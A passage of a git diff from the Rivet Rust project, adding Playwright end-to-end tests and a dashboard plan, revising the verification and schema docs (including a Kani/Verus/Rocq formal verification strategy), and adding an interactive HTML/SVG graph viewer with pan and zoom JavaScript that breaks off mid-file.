debounced HTMX request + await page.waitForTimeout(500); + await waitForHtmx(page); + await expect(page).toHaveURL(/q=OSLC/); + } + }); + + test('clear filters resets URL', async ({ page }) => { + await page.goto('/artifacts?types=requirement&status=approved&q=test'); + const clearBtn = 
page.locator('button:has-text("Clear"), a:has-text("Clear")'); + if (await clearBtn.isVisible()) { + await clearBtn.click(); + await waitForHtmx(page); + await expect(page).toHaveURL('/artifacts'); + } + }); + + test('pagination preserves filters', async ({ page }) => { + await page.goto('/artifacts?types=feature&page=1&per_page=10'); + // Click next page + const nextPage = page.locator('a:has-text("›"), a:has-text("Next")'); + if (await nextPage.isVisible()) { + await nextPage.click(); + await waitForHtmx(page); + // URL should have page=2 AND types=feature + await expect(page).toHaveURL(/page=2/); + await expect(page).toHaveURL(/types=feature/); + } + }); +}); +``` + +### Print mode tests + +- [ ] **Step 9: Write print-mode.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; + +test.describe('Print Mode', () => { + test('?print=1 hides nav and context bar', async ({ page }) => { + await page.goto('/stpa?print=1'); + // Nav should not be visible + await expect(page.locator('nav, .nav')).not.toBeVisible(); + // Context bar should not be visible + await expect(page.locator('.context-bar')).not.toBeVisible(); + // Content should still be visible + await expect(page.locator('h2')).toBeVisible(); + }); + + test('?print=1 works on all major views', async ({ page }) => { + const views = ['/artifacts', '/stpa', '/validate', '/matrix', '/coverage', '/documents']; + for (const view of views) { + await page.goto(`${view}?print=1`); + // Should render without nav + await expect(page.locator('nav, .nav')).not.toBeVisible(); + // Should have content + const bodyText = await page.locator('body').textContent(); + expect(bodyText!.length).toBeGreaterThan(50); + } + }); + + test('print button opens print view in new tab', async ({ page }) => { + await page.goto('/stpa'); + const printBtn = page.locator('button:has-text("Print"), a:has-text("Print")'); + if (await printBtn.isVisible()) { + // Check that the print link has print=1 + const href = await 
printBtn.getAttribute('href') || await printBtn.getAttribute('onclick') || ''; + expect(href).toContain('print=1'); + } + }); + + test('print view is suitable for PDF generation', async ({ page }) => { + await page.goto('/stpa?print=1'); + // Generate PDF to verify it doesn't crash + const pdf = await page.pdf({ format: 'A4' }); + expect(pdf.length).toBeGreaterThan(1000); + }); +}); +``` + +### URL state persistence tests + +- [ ] **Step 10: Write url-state.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; +import { waitForHtmx } from './helpers'; + +test.describe('URL State Persistence', () => { + test('filter state survives page reload', async ({ page }) => { + await page.goto('/artifacts?types=requirement&status=approved'); + await waitForHtmx(page); + const rowsBefore = await page.locator('table tbody tr').count(); + await page.reload(); + await waitForHtmx(page); + const rowsAfter = await page.locator('table tbody tr').count(); + expect(rowsAfter).toBe(rowsBefore); + await expect(page).toHaveURL(/types=requirement/); + await expect(page).toHaveURL(/status=approved/); + }); + + test('sort state survives page reload', async ({ page }) => { + await page.goto('/artifacts?sort=id&dir=desc'); + await page.reload(); + await expect(page).toHaveURL(/sort=id/); + await expect(page).toHaveURL(/dir=desc/); + }); + + test('page state survives page reload', async ({ page }) => { + await page.goto('/artifacts?page=2&per_page=20'); + await page.reload(); + await expect(page).toHaveURL(/page=2/); + }); + + test('HTMX navigation updates URL via pushState', async ({ page }) => { + await page.goto('/'); + await page.click('a:has-text("Artifacts")'); + await waitForHtmx(page); + // URL should reflect navigation + await expect(page).toHaveURL(/\/artifacts/); + // Should be a real URL change, not just hash + const url = new URL(page.url()); + expect(url.pathname).toBe('/artifacts'); + }); + + test('combined filter+sort+page state in URL', async ({ page }) 
=> { + await page.goto('/artifacts?types=feature&sort=id&dir=asc&page=1&per_page=10'); + await waitForHtmx(page); + // Verify all params are reflected in rendered state + await expect(page).toHaveURL(/types=feature/); + await expect(page).toHaveURL(/sort=id/); + await expect(page).toHaveURL(/page=1/); + }); +}); +``` + +### Additional view tests + +- [ ] **Step 11: Write traceability.spec.ts, documents.spec.ts, search.spec.ts, matrix.spec.ts, validation.spec.ts** + +Each spec covers: +- Page loads and renders content +- Filter/sort controls work +- URL state persists +- Links to other views work +- Print mode works + +Key tests per view: + +**traceability.spec.ts:** +- Traceability chain renders with expandable nodes +- Filter by artifact type narrows the chain + +**documents.spec.ts:** +- Document list shows all docs +- Document detail renders markdown as HTML +- AADL diagram blocks render SVG (if spar WASM loaded) +- Source refs are clickable links + +**search.spec.ts:** +- Search returns results for known artifact IDs +- Search highlights matches +- Empty search shows helpful message + +**matrix.spec.ts:** +- Matrix renders with from/to type headers +- Cell links navigate to artifact detail +- from/to/link params preserved in URL + +**validation.spec.ts:** +- Validation page shows diagnostics +- Error/warning badges match counts +- Severity filter works + +### Accessibility tests + +- [ ] **Step 12: Write accessibility.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; + +test.describe('Accessibility', () => { + test('all pages have valid heading hierarchy', async ({ page }) => { + const views = ['/', '/artifacts', '/stpa', '/validate', '/graph']; + for (const view of views) { + await page.goto(view); + // Should have at least one heading + const headings = await page.locator('h1, h2, h3').count(); + expect(headings).toBeGreaterThan(0); + } + }); + + test('all interactive elements are keyboard accessible', async ({ page }) => { + await 
page.goto('/artifacts'); + // Tab through page — should reach filter inputs and links + await page.keyboard.press('Tab'); + await page.keyboard.press('Tab'); + const focused = await page.evaluate(() => document.activeElement?.tagName); + expect(['A', 'INPUT', 'BUTTON', 'SELECT']).toContain(focused); + }); + + test('color contrast meets minimum ratio', async ({ page }) => { + await page.goto('/'); + // Check that body text has sufficient contrast against background + const contrast = await page.evaluate(() => { + const body = document.body; + const style = window.getComputedStyle(body); + return { color: style.color, bg: style.backgroundColor }; + }); + // Basic check — ensure colors are not identical + expect(contrast.color).not.toBe(contrast.bg); + }); +}); +``` + +### CI integration + +- [ ] **Step 13: Add Playwright to CI workflow** + +Add to `.github/workflows/ci.yml`: + +```yaml + playwright: + name: Playwright E2E tests + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: dtolnay/rust-toolchain@stable + - uses: Swatinem/rust-cache@v2 + - uses: actions/setup-node@v4 + with: + node-version: '22' + - name: Install Playwright + working-directory: tests/playwright + run: npm ci && npx playwright install chromium --with-deps + - name: Run Playwright tests + working-directory: tests/playwright + run: npx playwright test + - uses: actions/upload-artifact@v4 + if: always() + with: + name: playwright-report + path: tests/playwright/test-results/ +``` + +- [ ] **Step 14: Run full suite locally** + +```bash +cd tests/playwright && npx playwright test +``` + +Expected: All tests pass. Report generated in `test-results/`. 
+ +- [ ] **Step 15: Commit** + +``` +git add tests/playwright/ .github/workflows/ci.yml +git commit -m "test(serve): comprehensive Playwright E2E test suite for dashboard + +Verifies: FEAT-052 +Refs: REQ-007, SC-15" +``` + +--- + +## Task 10: Final integration and cleanup + +- [ ] **Step 1: Run full test suite** + +Run: `cargo test --all` +Expected: All tests pass. + +- [ ] **Step 2: Run clippy** + +Run: `cargo +stable clippy --all-targets -- -D warnings` +Expected: Clean. + +- [ ] **Step 3: Run rivet validate** + +Run: `cargo run --release -- validate` +Expected: PASS (0 warnings). + +- [ ] **Step 4: Manual smoke test** + +Visit all routes, test filter/sort/fold in each view, test print mode, test graph with focus and without, verify URLs are bookmarkable and survive reload. + +- [ ] **Step 5: Update docs/architecture.md** + +Update section 4 (Dashboard Architecture) to document the component kit, print mode, and URL-persisted state pattern. + +- [ ] **Step 6: Final commit** + +``` +git commit -m "docs: update architecture for dashboard component kit and scalability + +Refs: DD-005" +``` + +--- + +## Dependency Graph + +``` +Task 0 (STPA) ──────────────────────────────────────┐ +Task 1 (skeleton + layout) ──→ Task 2 (components) ──┤──→ Task 5 (STPA view) + Task 3 (ViewParams) ──┤──→ Task 6 (artifacts view) + Task 4 (graph fix) ──┤──→ Task 7 (remaining views) + ├──→ Task 8 (print mode) + └──→ Task 9 (Playwright E2E) + Task 10 (integration) +``` + +Tasks 0, 1 can run in parallel. Task 4's etch changes (Steps 1-3) can run in parallel with Task 1, but Task 4 Steps 4-5 (serve-side graph view) depend on Task 1 completing the skeleton. Tasks 2 and 3 depend on Task 1. Tasks 5-8 depend on Tasks 2+3. Task 9 is last. + +**Post-split housekeeping:** Update `safety/stpa/control-structure.yaml` — the `CTRL-DASH` controller's `source-file` field should change from `rivet-cli/src/serve.rs` to `rivet-cli/src/serve/mod.rs`. + +--- + +## Key Design Decisions + +1. 
**Server-side filtering over client-side** — HTMX re-renders HTML fragments server-side. No client-side JS state to manage. URL is always the source of truth. Note: this replaces the current instant client-side `filterTable()` JS with a server round-trip. To maintain perceived responsiveness, add `hx-trigger="keyup changed delay:300ms"` on text inputs so HTMX debounces the request. + +2. **Composable components, not a template engine** — Functions that return `String` HTML fragments. No Tera/Handlebars dependency. Stays consistent with the existing pattern. + +3. **Node budget, not pagination for graphs** — Graphs don't paginate well. Instead, cap the node count and require filters/focus to narrow. Show a helpful message when budget exceeded. + +4. **Print mode via query param, not separate routes** — `?print=1` on any existing URL gives a clean printable version. No route duplication. + +5. **Incremental extraction** — Move one view at a time from serve.rs to serve/views/. Dashboard stays functional at every step. diff --git a/docs/schemas.md b/docs/schemas.md index e718506..c3656fe 100644 --- a/docs/schemas.md +++ b/docs/schemas.md @@ -13,11 +13,15 @@ loads `common` plus one or more domain schemas. | `common` | 0.1.0 | -- | -- | Base fields and link types | | `dev` | 0.1.0 | 3 | 2 | Software development tracking | | `stpa` | 0.1.0 | 10 | 7 | STPA safety analysis | -| `aspice` | 0.2.0 | 14 | 10 | Automotive SPICE V-model | -| `cybersecurity` | 0.1.0 | 10 | 10 | Cybersecurity (SEC.1-4 / ISO 21434) | +| `aspice` | 0.2.0 | 13 | 10 | Automotive SPICE V-model | +| `cybersecurity` | 0.1.0 | 8 | 10 | Cybersecurity (SEC.1-4 / ISO 21434) | +| `aadl` | 0.1.0 | 4 | 1 | AADL architecture (spar integration) | Schemas are located in `schemas/` relative to the project directory. +> **Do not hardcode type or rule counts in other documents.** Use `rivet schema list` +> for current counts. The table above is maintained here as the single source of truth. 
+ --- ## Common Schema diff --git a/docs/verification.md b/docs/verification.md index 380f20f..3895951 100644 --- a/docs/verification.md +++ b/docs/verification.md @@ -25,189 +25,64 @@ as specified by [[REQ-014]]. ## 2. Test Suite Overview -Rivet's test suite consists of 59 tests across four categories: - -| Level | Category | Test Count | File | -|-------|---------------------|------------|-------------------------------| -| SWE.4 | Unit tests | 30 | `rivet-core/src/*.rs` | -| SWE.4 | Property tests | 6 | `rivet-core/tests/proptest_core.rs` | -| SWE.5 | Integration tests | 18 | `rivet-core/tests/integration.rs` | -| SWE.5 | STPA roundtrip | 5 | `rivet-core/tests/stpa_roundtrip.rs` | -| SWE.6 | Benchmarks | 7 groups | `rivet-core/benches/` | -| SWE.6 | CI quality gates | 10 stages | `.github/workflows/` | - -All 59 tests pass. Zero failures, zero ignored. +The test suite is organized by ASPICE verification level. Actual test counts +are maintained by the test runner — run `cargo test -- --list` for the +current count. + +| Level | Category | Location | +|-------|---------------------|---------------------------------------| +| SWE.4 | Unit tests | `rivet-core/src/*.rs` (`#[cfg(test)]` modules) | +| SWE.4 | Property tests | `rivet-core/tests/proptest_core.rs` | +| SWE.4 | Fuzz targets | `fuzz/fuzz_targets/` | +| SWE.5 | Integration tests | `rivet-core/tests/integration.rs` | +| SWE.5 | STPA roundtrip | `rivet-core/tests/stpa_roundtrip.rs` | +| SWE.6 | Benchmarks | `rivet-core/benches/` | +| SWE.6 | CI quality gates | `.github/workflows/` | ## 3. Unit Tests (SWE.4) Unit tests live inside `#[cfg(test)]` modules within rivet-core source files. -They verify individual module behavior in isolation. 
- -### 3.1 Diff Module (5 tests) - -File: `rivet-core/src/diff.rs` - -| Test | Verifies | -|-------------------------------|---------------| -| `empty_diff` | [[REQ-001]] | -| `identical_stores` | [[REQ-001]] | -| `added_artifact` | [[REQ-001]] | -| `removed_artifact` | [[REQ-001]] | -| `modified_title` | [[REQ-001]] | - -The diff module computes structural differences between two store snapshots. -These tests verify that added, removed, modified, and unchanged artifacts are -correctly classified. - -### 3.2 Document Module (9 tests) - -File: `rivet-core/src/document.rs` - -| Test | Verifies | -|-----------------------------------|---------------| -| `parse_frontmatter` | [[REQ-001]] | -| `missing_frontmatter_is_error` | [[REQ-001]] | -| `document_store` | [[REQ-001]] | -| `render_html_headings` | [[REQ-007]] | -| `render_html_resolves_refs` | [[REQ-007]] | -| `default_doc_type_when_omitted` | [[REQ-001]] | -| `multiple_refs_on_one_line` | [[REQ-001]] | -| `extract_references_from_body` | [[REQ-004]] | -| `extract_sections_hierarchy` | [[REQ-007]] | - -Document tests verify YAML frontmatter parsing, wiki-link reference extraction, -HTML rendering, and the document store. - -### 3.3 Results Module (9 tests) +They verify individual module behavior in isolation. Key modules tested: -File: `rivet-core/src/results.rs` +- **diff** (`diff.rs`) — structural diff between store snapshots. Verifies [[REQ-001]]. +- **document** (`document.rs`) — YAML frontmatter, wiki-link references, HTML rendering. Verifies [[REQ-001]], [[REQ-007]]. +- **results** (`results.rs`) — test results model, status predicates, YAML roundtrip. Verifies [[REQ-009]]. +- **reqif** (`reqif.rs`) — ReqIF 1.2 XML roundtrip, export validity, minimal parse. Verifies [[REQ-005]]. +- **coverage** (`coverage.rs`) — traceability coverage computation, edge cases. Verifies [[REQ-004]]. +- **store** (`store.rs`) — insert, lookup, by-type indexing, upsert. Verifies [[REQ-001]]. 
-| Test | Verifies | -|-----------------------------------|---------------| -| `test_status_display` | [[REQ-009]] | -| `test_status_is_pass_fail` | [[REQ-009]] | -| `test_result_store_insert_and_sort` | [[REQ-009]] | -| `test_latest_for` | [[REQ-009]] | -| `test_history_for` | [[REQ-009]] | -| `test_summary` | [[REQ-009]] | -| `test_load_results_empty_dir` | [[REQ-009]] | -| `test_load_results_nonexistent_dir` | [[REQ-009]] | -| `test_roundtrip_yaml` | [[REQ-009]] | - -These tests verify the test results model: status enum behavior, result store -ordering, latest/history queries, aggregate statistics, YAML roundtrip -serialization, and edge cases (empty/nonexistent directories). - -### 3.4 ReqIF Module (3 tests) - -File: `rivet-core/src/reqif.rs` - -| Test | Verifies | -|-----------------------------------|---------------| -| `test_export_produces_valid_xml` | [[REQ-005]] | -| `test_parse_minimal_reqif` | [[REQ-005]] | -| `test_roundtrip` | [[REQ-005]] | - -These tests verify that ReqIF 1.2 XML export produces valid structure, that -minimal ReqIF documents can be parsed, and that full roundtrip -(export then import) preserves all artifact data. - -### 3.5 Coverage Module (4 tests) - -File: `rivet-core/src/coverage.rs` - -| Test | Verifies | -|-----------------------------------|---------------| -| `full_coverage` | [[REQ-004]] | -| `partial_coverage` | [[REQ-004]] | -| `zero_artifacts_gives_100_percent` | [[REQ-004]] | -| `to_json_roundtrip` | [[REQ-004]] | - -Coverage tests verify the traceability coverage computation engine: full -coverage detection, partial coverage percentage calculation, vacuous truth -for empty sets, and JSON serialization roundtrip. +Test-to-requirement tracing is done via `// rivet: verifies` markers in test +source code (once [[FEAT-043]] ships) or via the TEST-* artifacts in +`artifacts/verification.yaml`. ## 4. 
Property-Based Tests (SWE.4) File: `rivet-core/tests/proptest_core.rs` Property tests use proptest to verify invariants with randomized inputs. -Each test runs 30-50 cases with generated data. - -| Test | Verifies | -|-----------------------------------|----------------------| -| `prop_store_insert_all_retrievable` | [[REQ-001]] | -| `prop_store_rejects_duplicates` | [[REQ-001]] | -| `prop_schema_merge_idempotent` | [[REQ-010]] | -| `prop_link_graph_backlink_symmetry` | [[REQ-004]] | -| `prop_validation_determinism` | [[REQ-004]] | -| `prop_store_types_match_inserted` | [[REQ-001]] | - -These properties verify: - -- **Store consistency** -- Inserting N unique artifacts yields a store of - size N where every artifact is retrievable by ID and by-type counts match. -- **Duplicate rejection** -- Inserting the same ID twice is rejected. -- **Schema merge idempotence** -- Merging a schema with itself produces the - same artifact types, link types, and inverse maps. -- **Backlink symmetry** -- Every forward link in the graph has a corresponding - backlink at the target node. -- **Validation determinism** -- Running `validate()` twice on identical inputs - produces identical diagnostic output. -- **Type iterator correctness** -- The `types()` iterator returns exactly the - set of types that have artifacts in the store. +CI runs at 1000 cases per property via `PROPTEST_CASES` env var. + +Key properties verified: + +- **Store consistency** — inserting N unique artifacts yields retrievable store of size N +- **Duplicate rejection** — inserting the same ID twice is rejected +- **Schema merge idempotence** — merging a schema with itself preserves all types and inverses +- **Backlink symmetry** — every forward link has a corresponding backlink ([[REQ-004]]) +- **Validation determinism** — `validate()` on identical inputs produces identical output +- **Type iterator correctness** — `types()` returns exactly the set of inserted types ## 5. 
Integration Tests (SWE.5) -File: `rivet-core/tests/integration.rs` +Files: `rivet-core/tests/integration.rs`, `rivet-core/tests/stpa_roundtrip.rs` Integration tests exercise cross-module pipelines: loading real schemas, building stores, computing link graphs, running validation, and computing traceability matrices. -| Test | Verifies | -|-----------------------------------|-----------------------------| -| `test_dogfood_validate` | [[REQ-001]], [[REQ-010]] | -| `test_generic_yaml_roundtrip` | [[REQ-001]] | -| `test_schema_merge_preserves_types` | [[REQ-010]], [[REQ-003]] | -| `test_cybersecurity_schema_merge` | [[REQ-016]] | -| `test_traceability_matrix` | [[REQ-004]] | -| `test_traceability_matrix_empty` | [[REQ-004]] | -| `test_query_filters` | [[REQ-007]] | -| `test_link_graph_integration` | [[REQ-004]] | -| `test_aspice_traceability_rules` | [[REQ-003]], [[REQ-015]] | -| `test_store_upsert_overwrites` | [[REQ-001]] | -| `test_store_upsert_type_change` | [[REQ-001]] | -| `test_reqif_roundtrip` | [[REQ-005]] | -| `test_reqif_store_integration` | [[REQ-005]] | -| `test_diff_identical_stores` | [[REQ-001]] | -| `test_diff_added_artifact` | [[REQ-001]] | -| `test_diff_removed_artifact` | [[REQ-001]] | -| `test_diff_modified_artifact` | [[REQ-001]] | -| `test_diff_diagnostic_changes` | [[REQ-004]] | - -### 5.1 Dogfood Validation - -The `test_dogfood_validate` test loads Rivet's own `rivet.yaml`, schemas, and -artifacts, then runs the full validation pipeline. This test must pass with -zero errors. It verifies that Rivet can validate itself -- the most direct -form of dogfooding. 
- -### 5.2 STPA Roundtrip Tests - -File: `rivet-core/tests/stpa_roundtrip.rs` - -| Test | Verifies | -|-----------------------------------|---------------| -| `test_stpa_schema_loads` | [[REQ-002]] | -| `test_store_insert_and_lookup` | [[REQ-001]] | -| `test_duplicate_id_rejected` | [[REQ-001]] | -| `test_broken_link_detected` | [[REQ-004]] | -| `test_validation_catches_unknown_type` | [[REQ-004]], [[REQ-010]] | - -These tests verify STPA-specific schema loading and validation: that all -STPA artifact types and link types are present after schema load, that basic -store operations work, and that broken links and unknown types are detected. +The **dogfood validation** test (`test_dogfood_validate`) loads Rivet's own +`rivet.yaml`, schemas, and artifacts, then runs the full validation pipeline. +This test must pass with zero errors — it verifies that Rivet can validate +itself, the most direct form of dogfooding. ## 6. OSLC Integration Tests @@ -259,25 +134,117 @@ a qualification gate: | `deny` | `cargo deny` | License violations, duplicate deps | | `vet` | `cargo vet` | Supply chain verification | | `coverage` | `cargo llvm-cov` | Code coverage metrics | -| `msrv` | MSRV 1.85 check | Backward compatibility ([[REQ-011]]) | - -## 9. 
Requirement-to-Test Mapping Summary - -| Requirement | Unit | Integration | Property | Total | -|---------------|------|-------------|----------|-------| -| [[REQ-001]] | 14 | 7 | 3 | 24 | -| [[REQ-002]] | 0 | 1 | 0 | 1 | -| [[REQ-003]] | 0 | 2 | 0 | 2 | -| [[REQ-004]] | 5 | 5 | 2 | 12 | -| [[REQ-005]] | 3 | 2 | 0 | 5 | -| [[REQ-006]] | 0 | 0 (gated) | 0 | 0+ | -| [[REQ-007]] | 3 | 1 | 0 | 4 | -| [[REQ-009]] | 9 | 0 | 0 | 9 | -| [[REQ-010]] | 0 | 2 | 1 | 3 | -| [[REQ-015]] | 0 | 1 | 0 | 1 | -| [[REQ-016]] | 0 | 1 | 0 | 1 | - -Requirements without direct test coverage ([[REQ-006]], [[REQ-008]], -[[REQ-011]], [[REQ-012]], [[REQ-013]], [[REQ-014]]) are verified through CI -quality gates, feature-gated integration tests, or benchmark KPIs rather than -unit tests. +| `msrv` | MSRV 1.89 check | Backward compatibility ([[REQ-011]]) | + +## 9. Requirement-to-Test Mapping + +Test-to-requirement traceability is tracked via TEST-* artifacts in +`artifacts/verification.yaml` and (once implemented) via `// rivet: verifies` +source markers scanned by [[FEAT-043]]. + +Run `rivet coverage` to see the current requirement-to-test coverage. + +> **Do not hardcode counts in documentation.** Test counts, artifact counts, +> schema type counts, and similar numbers go stale immediately. Use CLI +> commands (`rivet stats`, `rivet schema list`, `cargo test -- --list`) as the +> source of truth. The only exception is the schema reference table in +> [schemas.md](schemas.md), which is maintained as a single canonical location. + +## 10. Formal Verification Strategy (Phase 3) + +[[REQ-030]] specifies formal correctness guarantees at three levels, forming a +verification pyramid that builds on the existing test infrastructure. + +### 10.1 Kani Bounded Model Checking + +[[DD-025]], [[FEAT-049]] + +Kani proof harnesses exhaustively check all inputs within configurable bounds. +Each harness proves a specific property about the actual compiled code (per +SC-14). 
Target: 10-15 harnesses covering: + +| Target | Property proven | +|--------|----------------| +| `parse_artifact_ref()` | No panics for any `&str` input | +| `Schema::merge()` | No panics, all input types preserved | +| `LinkGraph::build()` | No panics for any valid store+schema | +| `LinkGraph::build()` | Backlink symmetry: forward A→B implies backward B←A | +| `validate()` cardinality | All `Cardinality` enum arms handled | +| `has_cycles()` | Terminates for graphs up to N nodes | +| `reachable()` | Result is a subset of all nodes, terminates | +| `orphans()` | Orphan set has no links or backlinks | +| `detect_circular_deps()` | DFS terminates for any graph | +| `Store::insert()` | Duplicate returns error | +| `compute_coverage()` | Coverage always in `[0.0, 1.0]` | + +CI integration: new `kani` job using `model-checking/kani-github-action`. + +### 10.2 Verus Functional Correctness + +[[DD-026]], [[FEAT-050]] + +Inline `requires`/`ensures` annotations proving: + +- **Soundness:** If `validate()` returns no error diagnostics, all + traceability rules are satisfied for the given store and schema. +- **Completeness:** For every traceability rule violation in the store, + `validate()` emits a corresponding diagnostic. +- **Backlink symmetry:** `links_from(A)` contains B ↔ `backlinks_to(B)` contains A. +- **Conditional rule consistency:** If two rules can co-fire on one artifact, + their `then` requirements do not contradict. +- **Reachability correctness:** `reachable()` returns exactly the transitive + closure of the specified link type. + +### 10.3 Rocq Metamodel Specification + +[[DD-027]], [[FEAT-051]] + +Schema semantics modeled in Rocq via coq-of-rust translation: + +- **Schema satisfiability:** Given a set of traceability rules and conditional + rules, prove that at least one valid artifact configuration exists (the + rules are not contradictory). 
+- **Monotonicity:** Adding an artifact to a valid store preserves validity of + previously valid artifacts (or formally characterizes when it doesn't). +- **Well-foundedness:** The traceability rule evaluation terminates for any + finite set of artifacts and rules. +- **ASPICE V-model completeness:** The `aspice.yaml` schema's rules enforce + the complete V-model chain from stakeholder requirements through system + and software requirements to design, implementation, and verification. + +### 10.4 Verification Pyramid + +``` + ╱╲ + ╱ ╲ Rocq / coq-of-rust + ╱ TQ ╲ Metamodel proofs: satisfiability, monotonicity + ╱──────╲ (ISO 26262 TCL 1 evidence) + ╱ ╲ + ╱ Verus ╲ Functional correctness + ╱ sound + ╲ validate() is sound + complete + ╱ complete ╲ (inline Rust proofs, SMT-backed) + ╱────────────────╲ +╱ ╲ +╱ Kani + proptest ╲ Panic freedom + property testing +╱ + fuzzing + Miri ╲ (automated, CI-integrated) +╱──────────────────────╲ +``` + +Each layer builds on the one below. The existing test infrastructure (proptest, +fuzzing, Miri, mutation testing) forms the base. Kani fills gaps with exhaustive +bounded checking. Verus adds provable correctness. Rocq provides the deepest +assurance for tool qualification. + +**STPA coverage:** H-12 (proof-model divergence), SC-14 (proofs verify actual +implementation). + +## 11. 
Phase 3 Verification Approach + +Each phase 3 workstream adds verification at the appropriate level: + +- **[[REQ-023]] Conditional rules** — proptest for rule evaluation determinism, Kani for condition matching panic freedom, Rocq for rule consistency proofs +- **[[REQ-025]] needs.json import** — fuzz target for malformed JSON, integration tests with real SCORE data +- **[[REQ-028]] rowan parser** — fuzz target for arbitrary byte input, Kani for parser panic freedom, unit tests for each syntax kind +- **[[REQ-029]] salsa incremental** — proptest comparing incremental vs full validation results, Verus soundness proof +- **[[REQ-030]] formal verification** — the Kani/Verus/Rocq harnesses ARE the verification +- **[[REQ-031]] CLI mutations** — proptest for random mutation sequences never producing invalid YAML, integration tests for all rejection cases diff --git a/etch/src/html.rs b/etch/src/html.rs new file mode 100644 index 0000000..b7d2104 --- /dev/null +++ b/etch/src/html.rs @@ -0,0 +1,167 @@ +//! Interactive HTML wrapper for etch SVG output. +//! +//! Produces a self-contained HTML document with embedded SVG and JavaScript +//! for pan, zoom, selection, and group highlighting. No external dependencies. + +use crate::layout::GraphLayout; +use crate::svg::{SvgOptions, render_svg}; + +/// Options for HTML output. +#[derive(Debug, Clone)] +pub struct HtmlOptions { + /// Page title. + pub title: String, + /// Show minimap (Phase 3b — reserved). + pub minimap: bool, + /// Enable search (Phase 3b — reserved). + pub search: bool, + /// Show legend (Phase 3b — reserved). + pub legend: bool, + /// Enable semantic zoom (CSS classes at low zoom levels). + pub semantic_zoom: bool, +} + +impl Default for HtmlOptions { + fn default() -> Self { + Self { + title: "Graph".into(), + minimap: true, + search: true, + legend: true, + semantic_zoom: true, + } + } +} + +/// Render a [`GraphLayout`] as a self-contained interactive HTML document. 
+/// +/// The returned string is a complete HTML page with embedded SVG and +/// JavaScript for pan, zoom, selection, and group highlighting. +pub fn render_html( + layout: &GraphLayout, + svg_options: &SvgOptions, + html_options: &HtmlOptions, +) -> String { + let svg_content = render_svg(layout, svg_options); + let js = include_str!("html_interactivity.js"); + let title = &html_options.title; + + format!( + r#" + + + + +{title} + + + +
+{svg_content} +
+ + +"# + ) +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::layout::{EdgeInfo, LayoutOptions, NodeInfo, layout}; + use petgraph::Graph; + use petgraph::graph::{EdgeIndex, NodeIndex}; + + fn build_test_layout() -> GraphLayout { + let mut g = Graph::new(); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "link"); + + layout( + &g, + &|_idx: NodeIndex, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![], + }, + &|_idx: EdgeIndex, e: &&str| EdgeInfo { + label: e.to_string(), + source_port: None, + target_port: None, + }, + &LayoutOptions::default(), + ) + } + + #[test] + fn html_contains_svg_and_script() { + let gl = build_test_layout(); + let html = render_html(&gl, &SvgOptions::default(), &HtmlOptions::default()); + assert!(html.contains("")); + assert!(html.contains("")); + assert!(html.contains("")); + } + + #[test] + fn html_contains_interactivity_code() { + let gl = build_test_layout(); + let html = render_html(&gl, &SvgOptions::default(), &HtmlOptions::default()); + assert!(html.contains("mousedown"), "should have pan handler"); + assert!(html.contains("wheel"), "should have zoom handler"); + assert!(html.contains("etch-select"), "should have selection event"); + assert!(html.contains("viewBox"), "should manipulate viewBox"); + } + + #[test] + fn html_has_semantic_zoom_css() { + let gl = build_test_layout(); + let html = render_html(&gl, &SvgOptions::default(), &HtmlOptions::default()); + assert!(html.contains("zoom-low"), "should have zoom-low class"); + assert!( + html.contains("zoom-overview"), + "should have zoom-overview class" + ); + } + + #[test] + fn html_has_selection_css() { + let gl = build_test_layout(); + let html = render_html(&gl, &SvgOptions::default(), &HtmlOptions::default()); + assert!( + html.contains(".node.selected rect"), + "should have selection CSS" + ); + } + + #[test] + fn html_title_customizable() { + let 
gl = build_test_layout(); + let opts = HtmlOptions { + title: "My Architecture".into(), + ..Default::default() + }; + let html = render_html(&gl, &SvgOptions::default(), &opts); + assert!(html.contains("My Architecture")); + } +} diff --git a/etch/src/html_interactivity.js b/etch/src/html_interactivity.js new file mode 100644 index 0000000..c07b00f --- /dev/null +++ b/etch/src/html_interactivity.js @@ -0,0 +1,128 @@ +// etch interactive SVG viewer — pan, zoom, selection, group highlight +(function() { + const container = document.getElementById('container'); + const svg = container.querySelector('svg'); + if (!svg) return; + + // Parse initial viewBox + const vb = svg.getAttribute('viewBox').split(' ').map(Number); + let [vx, vy, vw, vh] = vb; + const origVw = vw, origVh = vh; + + // State + let isPanning = false; + let panStart = { x: 0, y: 0 }; + let scale = 1; + + // --- Pan --- + svg.addEventListener('mousedown', e => { + if (e.target.closest('.node')) return; // don't pan when clicking nodes + isPanning = true; + panStart = { x: e.clientX, y: e.clientY }; + svg.style.cursor = 'grabbing'; + }); + + window.addEventListener('mousemove', e => { + if (!isPanning) return; + const dx = (e.clientX - panStart.x) * (vw / svg.clientWidth); + const dy = (e.clientY - panStart.y) * (vh / svg.clientHeight); + vx -= dx; + vy -= dy; + panStart = { x: e.clientX, y: e.clientY }; + updateViewBox(); + }); + + window.addEventListener('mouseup', () => { + isPanning = false; + svg.style.cursor = 'grab'; + }); + + // --- Zoom (wheel) --- + svg.addEventListener('wheel', e => { + e.preventDefault(); + const zoomFactor = e.deltaY > 0 ? 
1.1 : 0.9; + + // Zoom around cursor position + const rect = svg.getBoundingClientRect(); + const mx = (e.clientX - rect.left) / rect.width; + const my = (e.clientY - rect.top) / rect.height; + + const newVw = vw * zoomFactor; + const newVh = vh * zoomFactor; + + vx += (vw - newVw) * mx; + vy += (vh - newVh) * my; + vw = newVw; + vh = newVh; + scale = origVw / vw; + + updateViewBox(); + updateSemanticZoom(); + }, { passive: false }); + + // --- Selection --- + svg.addEventListener('click', e => { + const nodeEl = e.target.closest('.node'); + if (!nodeEl) { + if (!e.ctrlKey && !e.metaKey) { + svg.querySelectorAll('.node.selected').forEach(n => n.classList.remove('selected')); + } + return; + } + + if (e.ctrlKey || e.metaKey) { + nodeEl.classList.toggle('selected'); + } else { + svg.querySelectorAll('.node.selected').forEach(n => n.classList.remove('selected')); + nodeEl.classList.add('selected'); + } + + // If it's a container, highlight children + if (nodeEl.classList.contains('container')) { + const containerId = nodeEl.getAttribute('data-id'); + if (containerId) { + // Emit event for integration + 